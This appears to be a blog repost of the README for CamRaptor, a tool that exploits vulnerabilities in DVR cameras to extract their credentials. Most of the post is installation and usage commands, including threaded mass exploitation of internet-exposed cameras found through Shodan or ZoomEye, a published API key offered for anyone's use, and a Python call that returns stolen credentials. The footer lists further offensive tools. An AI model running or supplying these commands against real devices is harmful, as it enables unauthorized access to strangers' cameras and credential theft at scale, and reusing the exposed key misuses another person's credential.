CamRaptor : Tool That Exploits Several Vulnerabilities In Popular DVR Cameras To Obtain Network Camera Credentials

CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.

Features

  • Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamRaptor

Basic Usage

To use CamRaptor just type camraptor in your terminal.

usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[–shodan SHODAN] [–zoomeye ZOOMEYE] [-p PAGES]
CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain network camera credentials.
optional arguments:
-h, –help show this help message and exit
-t, –threads Use threads for fastest work.
-o OUTPUT, –output OUTPUT
Output result to file.
-i INPUT, –input INPUT
Input file of addresses.
-a ADDRESS, –address ADDRESS
Single address.
–shodan SHODAN Shodan API key for exploiting devices over Internet.
–zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, –pages PAGES
Number of pages you want to get from ZoomEye.

Examples

Exploiting single camera

Let’s hack my camera just for fun.

camraptor -a 192.168.99.100

Exploiting cameras from Internet

Let’s try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camraptor -t –shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free.

Exploiting cameras from input file

Let’s try to use opened database of cameras with -t for fast exploitation.

camraptor -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API Usage

CamRaptor also has their own Python API that can be invoked by importing CamRaptor to your code.

from camraptor import CamRaptor

Basic functions

There are all CamRaptor basic functions that can be used to exploit specified camera.

  • exploit(address) – Exploit single camera by given address.

Examples

Exploiting single camera

from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit(‘192.168.99.100’)
print(creds)

R K

Recent Posts

Bomber : Navigating Security Vulnerabilities In SBOMs

bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…

12 hours ago

EmbedPayloadInPng : A Guide To Embedding And Extracting Encrypted Payloads In PNG Files

Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…

13 hours ago

Exploit Street – Navigating The New Terrain Of Windows LPEs

Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…

3 days ago

ShadowDumper – Advanced Techniques For LSASS Memory Extraction

Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…

3 days ago

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

2 weeks ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

3 weeks ago